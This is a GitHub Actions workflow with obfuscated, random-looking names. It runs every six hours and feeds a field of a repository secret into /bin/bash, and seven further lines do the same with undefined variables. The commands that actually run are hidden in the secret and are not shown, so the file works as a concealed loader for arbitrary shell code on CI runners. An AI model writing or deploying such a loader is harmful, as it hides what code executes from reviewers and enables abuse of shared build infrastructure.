name: huyixin1923
on:
  workflow_dispatch:
  schedule:
    - cron: '13 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huyixin1923
        env:
          pnpuc7856: ${{ secrets.pnpuc7856 }}
        run: |
          echo $pnpuc7856 | jq -r .im1028 | /bin/bash
          echo $ri29819 | jq -r .ve509 | /bin/bash
          echo $cspa6951 | jq -r .s41 | /bin/bash
          echo $sybgf50972 | jq -r .n316 | /bin/bash
          echo $fun34409 | jq -r .akzw7983 | /bin/bash
          echo $j4907 | jq -r .va3 | /bin/bash
          echo $kr348 | jq -r .zdu3652 | /bin/bash
          echo $x3 | jq -r .eorty96047 | /bin/bash

